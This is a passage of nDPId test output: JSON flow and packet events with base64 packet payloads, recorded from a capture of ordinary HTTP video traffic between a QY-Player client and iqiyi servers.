\/9ykCP8BEFC+SAHf6KIuxM26NzaWtnezl6fewDtIUXdIpUNvjY4n6SJHizPbT3w\/3Ny\/r99Px6fHjhqayufk0f9gejvfraT3PH262h\/uXm8flYf24KTtalr7wbmfrfuyoDO1dZLfXhdbdbj9BusFPbrZf1uPnL+eZrWxvX9\/75b+Od+cvswmuXt76xfPxYT2dl4ev+6fH8\/Hx+en5NNP29v8uu\/yHZcd\/17kXbaXK9vbtin999\/x9OWMtM2mf2Nr29u2Kf\/1yvFuf\/jgvn+cyCv64+v8\/\/6i9vSfYWehwOKyE1ztrl8\/LXq1KWUo9HIYZXv1fv\/yMS7m8oyGt76nv1QfBl2p97WM51P1FWfhue\/vTGrdteb47vtp2GeSHha9yvCwHDMUDQ626qFw0uE5g8PO3PtKf6z+H73DZaf32vD7u15M75d3lHx9fyV\/eg8xy\/7zeHO\/g5s1cJowL+\/za7wK6JqibmaZR4xF4M3MqkM2sqUA3c0sFtpnHBEbhKhqMpAmeCxUdCk4VAwpNFQSa1HIJeNLIJSBac2MJTGtuLYFqvWIuuFabWuI7AtnacwnYcsklgMs1l4AuSyqpoMu5uRV0OTe3gq7k5lbQldzcCroikyUBVUFXLJeAriCyPXMG26+CroxJEx9V0NUyWRL+FXS1pqMw6KrkEtBVyyWgi1ycmcugayWXgK5RuiIGXeOpeHkJ0DHomkxI+rEEdM1yCehazyWga2OSxBYB3Ua5BHRbTeNFQLdJumgB3aaTJiEloNtaLvGMi6jLRgHdTrkEdDvnEtDtV8wF3Q5zkx2goNvhgGQ3KugOOCCTgO7gXAK6Q3MJ6I6WS0B3XDEXdKlcsRd4qdSpZ2sCXyoy4egTbgIFYCqWhpWBMJWea4CYCKeJZB8YGBPVXAPIRHmYGygTXbEZmImu2Oyc6xWbnXO9YrNzrldsds6otxmf5pxRcFONc0bFTTXOGSU31Thn1NxU45xRdFONc0bVzU6RzTnzSFN6c84ozek5zjmjNqca54zinGm6c0Z1bkmG685ZcJrINM4ZxTfVOGeldJ9256yca5yzaq5xztp+07y2WK+9gDdRX59OR++dLu2Cd0vve4JaK7qpoLCCS2Wy8Htn0uHJGipAhNHRUTwH"} +01353{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1467353156700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":721,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":721,"pkt_l4_len":687,"thread_ts_msec":1467353156700,"pkt":"ABxCjnAxTF4M6gNlCABFAALD\/f5AADgGxVbfGmoUwKhzCABQxTgCs2BB2CN2nFAYAB9NTQAAeAj6KkVzGFgBGjLKoHgWsNDOg9EyBWMg4qw3sngWxFvTJslqEW1dOtsIZ\/G2YAiauUTisVZE0efGwzjXWg05LdZ4rAky0eBYc4m1ISOZy2PN0IHWZC6PtYYzQuJG8j0ND\/TECQTGtXRrmc2gXLGqInHIeH+AZh3hH4eENwhVsfKSjAPO1cTSYzk4VwRGT0LHe4TarWqyLm8S6mgVURj6q4IzFzPKNODMJE042ZbgzNQZongucObqtx3iTeOdAgtOFElsMDiz4j7IiGOewZkNmDWZyzNFp1ZHvEUZnLk3hGq8dm8XeCg2YczZ+wUeo3ON9wWDs+AA03qiAWdBguyZBpyFEaoU8\/GeQWCxJqlYwFm0ElwW+tS7BtGB8In5eNsgxoYYisfxnNwQiUliF8\/KHRWxxZwFnLGTCyWxIc55GI5LybrAWQsivsW+EHBWpMMucU7w7kGRWyyJeW8flHELMtOAswKQchyrCs6qvbWEs4Kz2mjW4n2q4IzsMyyJDQVn3LPtqKOhTxWcdXQc7RMNOFtBRUl84T0EvFVRbcO5vIcwFIPOsU8NnJExccMztsd7CARqqdlc4IxwNkRibA84m1Rl7rEGnA1No1kcPwbOptwRi\/E44GyK5JL0auaczVRLvE\/NOTdmsdhm7yG8mHJSC5pz7grS8T5tznl40Y3X3pwzVoX9E669gXMrSszJXODcCF1fS8YBZ9yrRE6I97v3EKimuN8fx2ED54ZUh6iPbQbnJlpQLEON9xDNzxJJTvAeopn2mnDu4Nya74w45js4t45NmNQ47yFa70xJ7u3OefiZN1kXOHesvIxf4\/Dy8OXXvmF7+\/b4wXuLdx\/fPY3AD+9f8Jzp8vDGHzT9Byu2GoeKGgAADQowDQoNCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156959,"flow_last_seen":1467353156959,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1467353156959,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00719{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1467353156959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1467353156959,"pkt":"TF4M6gNlABxCjnAxCABFAADvDvNAAIAGMe3AqHMId7wNvMU5AFAa+1ILYx41VVAYAQTDtAAAR0VUIC9rIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBwZGF0YS52aWRlby5xaXlpLmNvbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156959,"flow_last_seen":1467353156959,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1467353156959,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/k","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00955{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1467353156998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":430,"pkt_l4_len":396,"thread_ts_msec":1467353156998,"pkt":"ABxCjnAxTF4M6gNlCABFAAGgqmFAADQG4c13vA28wKhzCABQxTljHjVVGvtS0lAYAB+FPAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtTGVuZ3RoOiAyMDQNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCnsidCI6IjE0NjczNTMxNTYiLCJtIjoiZWMyZmQ2Njc4YTM1N2MyMDhkNTE4NmIzYzM0MjI0NmJlZTQ0YzUwY2U3MDgzOTNlIiwidSI6ImVjMmZkNjY3OGEzNTdjMjBmNTVhODJlZDYwZjYzZjk2Y2QyMDlhMWQ4OGI3ODQyNSIsImkiOiIyMjAuMTgxLjEwOS4zMyIsImsiOiJlYzJmZDY2NzhhMzU3YzIwNjI1MTY2M2U4NGQ3MDFkOTlkYjQyZTUxY2I5MWM1MzkifQ=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157063,"flow_last_seen":1467353157063,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1467353157063,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1467353157063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"thread_ts_msec":1467353157063,"pkt":"TF4M6gNlABxCjnAxCABFAAFXDwhAAIAGMXDAqHMId7wNvMU6AFAWZyP1RIzmWFAYAQR4owAAR0VUIC8yZWZjOGNkNWZiZTBmNGVlNDk4ZmIxYzJmYzFkZThiNi92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2PyZ0bj0xMzc3MTkgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IHBkYXRhLnZpZGVvLnFpeWkuY29tDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157063,"flow_last_seen":1467353157063,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1467353157063,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?&tn=137719","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01021{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1467353157103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":479,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":479,"pkt_l4_len":445,"thread_ts_msec":1467353157103,"pkt":"ABxCjnAxTF4M6gNlCABFAAHRefhAADQGEgZ3vA28wKhzCABQxTpEjOZYFmclJFAYAB\/Y6wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjUyDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJiZ0bj0xMzc3MTkmdXVpZD03NmEzMDg1YS01Nzc2MDg0NC1kZSIsImUiOiIwIn0="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157138,"flow_last_seen":1467353157138,"flow_idle_time":7560000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":372,"midstream":1,"thread_ts_msec":1467353157138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1467353157138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":426,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":426,"pkt_l4_len":392,"thread_ts_msec":1467353157138,"pkt":"TF4M6gNlABxCjnAxCABFAAGcDxlAAIAGbTXAqHMI3xpqQsU7AFAuAjEcSma44VAYAQTWMgAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSYmdG49MTM3NzE5JnV1aWQ9NzZhMzA4NWEtNTc3NjA4NDQtZGUgSFRUUC8xLjENClJhbmdlOiBieXRlcz0wLTQwOTU5DQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiAyMjMuMjYuMTA2LjY2DQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDo1MDA0OTQ2MDBfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157138,"flow_last_seen":1467353157138,"flow_idle_time":7560000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":372,"midstream":1,"thread_ts_msec":1467353157138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +02177{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1467353157142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353157142,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUui5AADgGBqjfGmpCwKhzCABQxTtKZsK5LgIykFAQAB\/uTwAAXABAYzwo9cKPXABAY3wo9cKPXABAY7wo9cKPXAAACQAACKIJAAAyAAAAAAAAABcAAAAAAWQAH\/\/hAB1nZAAfrFYkCgL\/lmoCAgKAAAADAIAAABlHjBjFQAEABWjomvLAAAAAPQgAAAkAAAAAAAAArwATkFblpUgAAAAAFAkAbwgAAAAAAAAAFwEAAFAAAG7\/ZYiCABX\/95xkfm3FH8zfxiVyZItj2+QvcPG\/css\/ZW+K7oKmOXqvyof6+MpsbuBrR3NlYBBVWVRq3WcvPz43KJn6OOq7wUatnW33K69XETXFsUoSgXdN7o0kq4w+hJrrFVm3jhsmgXWVk6qs6hebWuZRXfCylsvlyYQvoo8ujkxwf\/jOPhyl6i\/pTDKbDQZOrGmk9iGos+6hcPjtrVmq5rC28bSpDQb\/l3J+48zXTAIJQ0eBYWXFdgZPT7ei\/1f\/9\/tmNrD8GxGJp2OeeHzKlWg0+2iCixox6opp5+CbF3ew+UCOGdg3U\/5oVyFXyPX7+O0Is6zwfWwGCWJoC6\/zQa49qCQPS9W27Dn4e7vsWHcsLdg3UHzR4Z1JuDFBW7ue0EA3sC0gP\/mqqJuTdXptxBOJRjQ63vSnOV7PtDcJs4A7oWz2JzmEh+VbAw2U5760xCgZf0h+IR4GdMhaD57XDY8NdoZSDUzKAjvVKzHkc\/gdXpR0l6TIGuQcP2n5BFznR2iYeCE\/miwzmIeVW7avmSkaYobdmdMxT40yLpSDo7E8P+71xqJEqUUh6vFl9rz126Cgazh0LClcgaFaNKcZScAJKPrVP1o7kkOIcKwxW2CdOD77SH4zyVYWD9ULtNPIZ77Kl\/LYJQ8L2R419x+V6vNClYH7FDNYQst\/D12fjQ\/m+4yqq8ANYgNFZAXKlC8uKiIfcH\/TAErY7s8c2cJx1lhY3xTKhpLrPcsLU9UsA+Oip34KoUwvW3F5sUP0n2c\/KNlUH5ayGqegy5bryGeYm\/zuaor3RjqVC+afHCqaNQNUM+bdihsi6\/dYDdiuHkznFARXAj+HmRzPclqFdQs0umlOh+4nrXrTgUTsq6Mijt5YgP1vOKM5AtjEldVCDmGr1tU5uzTP\/wOgMtD4fsuENAnY849iMY16mjQC8PBzOazume30AYsAvNe5umLe2Jg9g1q77PVd7s5Hu\/6sIJWIf7my9bXHqgu1vXqQE6ohulSfKXSbeWRxV1zDne\/VQKrMqsiN5thBJ6eGrmP690VCEON3vIc3K8eMxOBEG1sH2gt0\/QY+qtme7NqWlgnah6YGN282gbUWFJTA8lul4VGFodu6rBHcO4b\/OZ2Vgodz1eVa7Rvhlz0zeO\/YLtQjl7fwTfVY1piKLJlsXBuH5KXSLNolBVVHCVrAQmkekZvhiLsm\/G4SGTer+1uPrS5m3ZHSe234ovyt+yHtfZCEP\/\/gOVJ5LO7C7uAyroC7rFx6lIcBOyO9mnt4Fi0rv6nmI9Iuf1\/XjKYeJJ3hPNphBZXvUwpvdJUyrMP\/WSQf4xrhUZbkn+wcvgAg5Hq\/N\/ilxIaAfekOtHVgU5VwnYm0lrbpwZtnYoLYol2itsi\/Tiny8B2OHcGdfUzCAOCON\/0+\/ipakxXBeRa7CLgs5mjI+rNnEby8whMLuruKRetpD4LDPViHWG\/OwHoZ14S6hpwBDqQ07xh3U7DjW9xs4GqS"} +02162{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1467353157142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353157142,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUui9AADgGBqffGmpCwKhzCABQxTtKZselLgIykFAQAB\/aLgAAopnkFb6w\/Gf9wcd\/TnuexQBjLwWa0uCe9TPr4qE3jsphraOf\/lM4Hhi9NJILTNUPpkUh0lJVsTBg0+IryxSW3IwYySV6wkzB0\/tYDwbO6SOx\/W5mmrffIH5hc9hR+iJYkdxSMJyhs5tL+JX3Z4urkWLC21HQmnbWWhKwwr3IOESy8lC4QLT5bzgZZwV6aylc3BKRGmkWqvo3gveBLOrAMA4JoqHhbMBYA7GEB3n5XVRePARG35OUMCE\/8TDQo0+dLC24GKANopCzYZkvfPVaY0dRDrv50emXg1Cs9WSfVu50aDF7YYVdx5mx545GrUAMEsqIjDQ\/4DCox7xS+Ws\/dwFhUTJ0P8Dx\/xK2lp12JPYf\/zG6tdTYMt3AacBTBvLHFFde\/reBoQaTbZB\/vJdywKaKtIzwqCOs4Q9YPbL8+Pq1VE1FdEBeuONtnWPx9wNuAvH6U\/JENWXsD\/bsjom76483YU\/XZIQUgj30cOEgQwuDamiBln+90aAngeN2nOL6ntmgjdG66Xp5PKfwQlwuGdvacgApEFyIvnfxUhm77eXRcDexRzOKtayXJEIXZt52rm2WbDXx+l2L+n6mDI5HPlSGKuvP84rwmMwhT7yEvzQKbivh5sn9I8EjZx6KaukURUZTKe54jHmLC3Jmf2BKkUKfD+otim\/knbUQxDjsPRmRG1Nf5oF86K6KEl\/nFEI9A5kcjFcko+VuDqw9SWzSXgKad5EYc4r+hlUwt3uzj59viQUjCCWYguaIGZ8C5ZjdSExE6IsY1BXoMFqHoRzfJaDg6uSsFAjJS92cQgN0nWwTaQFWx1m2slB35iQ1wft22PbPDl49icFcTFpAz2oY5Pp3lfvj5IUJyUTHt3u8v74exA53o9ooOtbqs2j42om\/zaB3iyhBCsOikAKzbr0K6CxGSwBAWdloUe96BLdalzPNcqhIK0c0YJvH4tBdmDh+5ufseEBw7BGI2ipV6yVNpFO0kDqCajN7YsN05JDg13dAXzY2SAQ5QfKni3cz7N9WhYMt7COKUvI+C0iwIaEB32bniucRrN4HsPO11eCbWDnltN\/+kP2qhoa5r1DcSUAZq6JPm51\/USDg6qO4x\/Vapf6ZVCWehE+KdgGpX4qBTKeA+bV7qois7qvnsCmBXUWPo21DtRYTVMizQCWWQqH0CGGSEtoZ24ZE8Em+sX59yNgKKKnBzY4rxhy1pF8qyBkoHpDm9lBx3JEleYOnrbk5vilJTiHsG0C7im31hM5hXvKl2rEhKIpc+QgsAwc8xEkz7398lWjZRYNmVmvhEG3GTaIjL7zuDYVBFnz\/Ep+CquTSroYI\/KVwc+2ze3Q+yBDcODi+bFdRr\/qJ\/RfL4FgeDb9sduAkPb3xQiixfjLzyzTazf6dzG3+S06aSi8zpu2nZ2pA6Ukh\/FodlR311cw8YfsxYuiSFyYqZDzpce1Qm0XZXnys8qlDnUmjILug1tlJBa1UzH74juRDwgD0Fnwh1MLjNAsmUIrgA0GSsiEjUBU047yfXV\/qzyvQus+1BXKIiklyV0Xin7L0ua0Yj38t6gGn+ytwXAmSh71WYg7o3suhEh2DpzfHKZ9IBKf8gIvOvhTvSepAfXGEaca4phlMY6YIuwsde9HzRk9q6m3wLv6MKf1l9nyMKAHgaDMdK68E7LAU50IjtX2yCF8K"} +01059{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1055,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353157138,"flow_last_seen":1467353157142,"flow_idle_time":7560000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2892,"flow_avg_l4_payload_len":964,"midstream":1,"thread_ts_msec":1467353157142,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157433,"flow_last_seen":1467353157433,"flow_idle_time":7560000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":335,"midstream":1,"thread_ts_msec":1467353157433,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1467353157433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":389,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":389,"pkt_l4_len":355,"thread_ts_msec":1467353157433,"pkt":"TF4M6gNlABxCjnAxCABFAAF3D2lAAIAGOZbAqHMIb84NA8U8AFD\/xaF06zAEllAYAQRGTAAAR0VUIC8yZWZjOGNkNWZiZTBmNGVlNDk4ZmIxYzJmYzFkZThiNi92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P3F5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiBIVFRQLzEuMQ0KSG9zdDogcGRhdGEudmlkZW8ucWl5aS5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBIQ0ROQ2xpZW50X1dJTlBDO2xpYmN1cmwvNy4yNi4wIE9wZW5TU0wvMS4wLjFnIHpsaWIvMS4yLjU7UUsvMTAuMC4wLjI5Mw0KDQo="} +00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157433,"flow_last_seen":1467353157433,"flow_idle_time":7560000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":335,"midstream":1,"thread_ts_msec":1467353157433,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157468,"flow_last_seen":1467353157468,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353157468,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 